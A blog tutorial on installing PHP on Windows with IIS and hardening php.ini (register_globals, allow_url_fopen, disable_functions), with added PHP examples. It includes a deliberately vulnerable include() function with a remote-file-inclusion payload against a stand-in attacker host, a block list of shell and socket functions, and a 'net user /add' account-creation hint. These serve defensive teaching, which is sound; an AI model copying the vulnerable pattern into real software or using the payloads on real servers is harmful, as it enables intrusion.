WinBlogs



Setting up a server for web hosting – part 4: Installing PHP

Hello after a very long pause 🙂. Continuing the "Setting up a server for web hosting" series with a new smashing video on how to install PHP on your machine! AWESOME, right? 🙂

At the very beginning of the post, let's learn what PHP exactly is.

So, Wikipedia says (and I add that I agree with it 🙂):

PHP: Hypertext Preprocessor is a widely used, general-purpose scripting language that was originally designed for web development to produce dynamic web pages. For this purpose, PHP code is embedded into the HTML source document and interpreted by a web server with a PHP processor module, which generates the web page document. As a general-purpose programming language, PHP code is processed by an interpreter application in command-line mode performing desired operating system operations and producing program output on its standard output channel. It may also function as a graphical application. PHP is available as a processor for most modern web servers and as standalone interpreter on most operating systems and computing platforms.

PHP was originally created by Rasmus Lerdorf in 1995 and has been in continuous development ever since. The main implementation of PHP is now produced by The PHP Group and serves as the de facto standard for PHP as there is no formal specification. PHP is free software released under the PHP License.

So, now that we know what PHP is, let's check the basic PHP syntax:

    <?php
        echo "Hello World";
       /* echo("Hello World"); works as well, although echo isn't a
        function (it's a language construct). In some cases, such
        as when multiple parameters are passed to echo, parameters
        cannot be enclosed in parentheses */
    ?>

You can find out more about the PHP project on www.php.net.

In this case, I will use the Windows Web Platform Installer to install PHP on my machine. The installer is available from Microsoft's Web Platform Installer page (the same page is used in the video).

Check out the video (don't forget to put it in full screen mode 🙂):

So, now you're all full of excitement and thinking "LOL, installing PHP is extra easy, anyone could do it"... NAH!!! And the host says: you lost 🙂

First, let's check whether PHP is working at all on our server. Yes, we could use the syntax shown above, but that just isn't fun 🙂. To get detailed info on our PHP installation, let's use this:

    <?php phpinfo(); ?>

Let's navigate to c:\inetpub\wwwroot\ and create a file called "phptest.php". We do that with a right click, New – Text Document, and then rename the file to phptest.php. Windows hides known file extensions by default, so double-check that the file really is phptest.php and not phptest.php.txt (turn on "File name extensions" in Explorer, or create the file from a command prompt instead).

Inside the document paste the piece of code above, save it, and cross your fingers 🙂.

Point your browser to your server address, and to the phptest.php file.

If everything went smoothly you should see the phpinfo() report: PHP version, build details, the list of loaded extensions and, importantly for the next section, a row called "Loaded Configuration File" that tells you exactly which php.ini this PHP is using.

If you see that page, PHP on our server is working properly. One caveat: phpinfo() tells anyone who can reach it your PHP version, file system paths and loaded modules, so delete phptest.php from wwwroot as soon as you are done testing.

Now, lets have some fun with security issues in PHP.

First of all, we have to check the php.ini file, which on my machine is located in C:\Program Files (x86)\PHP\php.ini (if the "Loaded Configuration File" row in phpinfo() shows a different path, edit that file instead, otherwise your changes will have no effect). Let's open it with Notepad.

Most of the options are explained in the file itself, so we will skip them. The focus will be only on the most important ones.

One of the interesting lines is this:

    ; - magic_quotes_gpc = Off         [Performance]

That line is only the commented-out quick-reference summary at the top of php.ini; the real directive appears further down as `magic_quotes_gpc = Off`, and that is how it should stay. Magic quotes were never a real defence against SQL injection, they were deprecated in PHP 5.3.x and removed in 5.4. Note that PHP's built-in default for this directive is On, so if the directive is simply missing from your php.ini the feature is actually enabled; confirm the effective value in the phpinfo() output.

Second option is:

    register_globals = Off

LEAVE THAT TURNED OFF. With register_globals on, every request parameter silently becomes a global variable, so any variable the application forgets to initialise is attacker-controlled. It was deprecated in PHP 5.3 and removed in 5.4. If you have clients with ancient applications that depend on it, tell them to rewrite them 🙂. More about the discussion on using register_globals can be found in the PHP manual ("Using Register Globals").

Third one that should be disabled is:

    allow_url_fopen = On

The standard setting after installation is "On", which is bad and wrong for many reasons 🙂. The reason is not cross-site scripting, though: the classic hole is remote file inclusion, where a vulnerable CMS or forum script passes a request parameter to include/require and an attacker points it at a URL on his own server, so his code runs on yours with the rights of the web server account. Since PHP 5.2 the include case is governed by a separate directive, allow_url_include (Off by default), and allow_url_include cannot be enabled while allow_url_fopen is Off, so turning this off closes both. It also removes the URL wrappers from fopen(), file_get_contents() and friends, so a buggy script cannot be turned into a proxy that fetches arbitrary URLs from your server. I really think you don't want that 🙂
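To make the hole concrete, here is an added example (not code from the original post) of the include pattern described above, beside an allow-listed version that does not build the include path from request data. The `page` parameter, the `pages/` directory and the page names are assumptions for illustration.

```php
<?php
// Added example, not from the original post. Shows the remote/local file
// inclusion pattern that URL wrappers in include/require make exploitable.

// VULNERABLE: the request parameter reaches include() unchecked. If PHP may
// include URLs (allow_url_include=On, which requires allow_url_fopen=On),
// ?page=http://attacker.example/shell? pulls in and executes remote code
// (the trailing ? turns the appended ".php" into a harmless query string).
// Even with URL wrappers off, "../" sequences still give local file inclusion.
function render_page_unsafe(array $get): void
{
    $page = $get['page'] ?? 'home';   // assumed parameter name
    include $page . '.php';
}

// HARDENED: map the untrusted value onto a fixed allow-list of known files.
// The request never contributes characters to the path, only a lookup key.
function render_page_safe(array $get): void
{
    static $pages = [                 // assumed page names and locations
        'home'    => __DIR__ . '/pages/home.php',
        'about'   => __DIR__ . '/pages/about.php',
        'contact' => __DIR__ . '/pages/contact.php',
    ];
    $key = $get['page'] ?? 'home';
    if (!isset($pages[$key])) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $pages[$key];
}

render_page_safe($_GET);
```

The php.ini directives are defence in depth: they limit the damage when a script like `render_page_unsafe()` slips through, but the real fix is in the application, and the allow-list also blocks the local `../` variant that no php.ini setting prevents.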

But never fear, the alternative is here 🙂. Tell your customers (or yourself) to use curl for fetching remote content; the curl extension is not affected by allow_url_fopen.

The standard fopen call should be replaced with a curl call:

Fopen function

    <?php
    // fopen() returns a stream handle, not the content, so read it explicitly.
    // The mode must be a quoted string; the original bare r is an undefined constant.
    $fp = fopen($url, 'r');
    $result = stream_get_contents($fp);
    fclose($fp);
    ?>


Curl function

    <?php
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    // Without RETURNTRANSFER curl_exec() prints the body and returns true/false,
    // so $result would never hold the fetched content.
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $result = curl_exec($ch);
    if ($result === false) {
        $result = '';   // or inspect curl_error($ch)
    }
    curl_close($ch);
    ?>

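Swapping fopen for curl does not by itself make fetching remote content safe: curl also speaks file://, ftp:// and other protocols, follows redirects if asked, and will happily hang on a slow host. Below is an added example (not code from the original post) of the curl fetch with the guards a production script should have; `fetch_remote()` and its parameters are assumed names.

```php
<?php
// Added example, not from the original post: a curl fetch restricted to http(s),
// with no redirects, timeouts, certificate checks and a size cap.
function fetch_remote(string $url, int $maxBytes = 1048576): ?string
{
    // Reject anything but plain http/https before curl ever sees the URL.
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        return null;
    }

    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,   // return the body instead of printing it
        CURLOPT_HEADER         => false,
        CURLOPT_FOLLOWLOCATION => false,  // a redirect must not change the target
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_CONNECTTIMEOUT => 5,
        CURLOPT_TIMEOUT        => 15,
        CURLOPT_MAXFILESIZE    => $maxBytes,  // honoured when Content-Length is sent
        CURLOPT_SSL_VERIFYPEER => true,
        CURLOPT_SSL_VERIFYHOST => 2,
    ]);

    $body = curl_exec($ch);
    $code = (int) curl_getinfo($ch, CURLINFO_HTTP_CODE);
    $err  = curl_error($ch);
    curl_close($ch);

    if ($body === false || $code !== 200) {
        error_log("fetch_remote($url) failed: HTTP $code $err");
        return null;
    }
    if (strlen($body) > $maxBytes) {
        return null;   // server lied about or omitted Content-Length
    }
    return $body;
}

// Usage with a constructed URL (not a real resource):
$html = fetch_remote('https://example.invalid/feed.xml');
echo $html === null ? "fetch failed\n" : strlen($html) . " bytes fetched\n";
```

If the URL comes from a user, this is still not enough: you also have to decide whether requests to your own internal network are acceptable (resolve the host and reject private or loopback addresses). On PHP 8.4 with a recent libcurl, CURLOPT_PROTOCOLS is deprecated in favour of CURLOPT_PROTOCOLS_STR ("http,https"); the older constant still works.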

Next, a very important setting:

    disable_functions =

By default it is empty. Unlike most directives, this one can only be set in php.ini itself (it is PHP_INI_SYSTEM, so a script cannot undo it with ini_set()), which is exactly what makes it useful against code that is already running on your server.

Here are some of the most common functions to be disabled: system, exec, shell_exec, passthru, set_time_limit, error_log, ini_alter, dl, pfsockopen, openlog, syslog, readlink, symlink, link, leak, fsockopen, popen, escapeshellcmd, apache_child_terminate, apache_get_modules, apache_get_version, apache_getenv, apache_note, apache_setenv, virtual

Google a bit to find out what these functions do (the apache_* ones only exist under the Apache module and are simply absent on IIS, so listing them is harmless). As an example, I would disable the `exec` function (among others), but you find out why 🙂
(hint: net user /add useraccountname mypassword)

When you're done editing php.ini, restart IIS (for example with iisreset from an elevated command prompt) so the PHP processes pick up the new settings, and that's it.
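Editing php.ini is easy to get wrong (wrong file, typo in a directive, a setting that no longer exists in your PHP version), so here is an added example (not code from the original post) that checks the effective configuration after the restart. It reports which php.ini is loaded, the state of the directives discussed above, and which of the listed functions are still callable. The file name check_php_ini.php is an assumption; drop it into wwwroot, open it in the browser, and delete it afterwards just like phptest.php.

```php
<?php
// Added example, not from the original post. Verifies the effective PHP
// configuration after editing php.ini and restarting IIS.
// Also runs from a prompt: "C:\Program Files (x86)\PHP\php.exe" check_php_ini.php
header('Content-Type: text/plain');

$ini = php_ini_loaded_file();
echo "Loaded php.ini: ", ($ini ?: "(none - PHP is running on built-in defaults!)"), "\n\n";

// Directives the post says must be Off. register_globals and magic_quotes_gpc
// were removed in PHP 5.4; ini_get() returns false for unknown directives.
foreach (['register_globals', 'magic_quotes_gpc', 'allow_url_fopen', 'allow_url_include'] as $d) {
    $raw = ini_get($d);
    if ($raw === false) {
        $state = 'not present in this PHP version (OK)';
    } elseif (filter_var($raw, FILTER_VALIDATE_BOOLEAN)) {
        $state = 'ON   <-- turn this Off';
    } else {
        $state = 'Off (OK)';
    }
    printf("%-18s %s\n", $d, $state);
}

// The function list from the post. function_exists() is false both for
// functions removed by disable_functions and for functions this build never
// had (the apache_* family is Apache-only and never exists under IIS).
$wanted = ['system', 'exec', 'shell_exec', 'passthru', 'set_time_limit', 'error_log',
    'ini_alter', 'dl', 'pfsockopen', 'openlog', 'syslog', 'readlink', 'symlink', 'link',
    'leak', 'fsockopen', 'popen', 'escapeshellcmd', 'apache_child_terminate',
    'apache_get_modules', 'apache_get_version', 'apache_getenv', 'apache_note',
    'apache_setenv', 'virtual'];
$disabledRaw = (string) ini_get('disable_functions');
$disabled = array_filter(array_map('trim', explode(',', $disabledRaw)));

echo "\ndisable_functions = ", ($disabledRaw === '' ? '(empty!)' : $disabledRaw), "\n\n";
foreach ($wanted as $f) {
    if (function_exists($f)) {
        printf("%-24s STILL CALLABLE\n", $f);
    } elseif (in_array($f, $disabled, true)) {
        printf("%-24s disabled via php.ini (OK)\n", $f);
    } else {
        printf("%-24s not available in this build/SAPI\n", $f);
    }
}
```

If "Loaded php.ini" points somewhere other than the file you edited, or a directive you changed still shows the old value, IIS has not been restarted or you edited a copy PHP is not reading.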

The next step is to install a PHP-based application and admire your work.

Of course, this is a very quick tutorial on installing PHP. Configuration is the trickiest part, and you should use the official PHP site and Google to help you with it!

Cheers, Alesandro



1 Comment

  1. Nevena

    Ohhhh, it’s great dude…Thank you for posting it – you saved my life… 😀
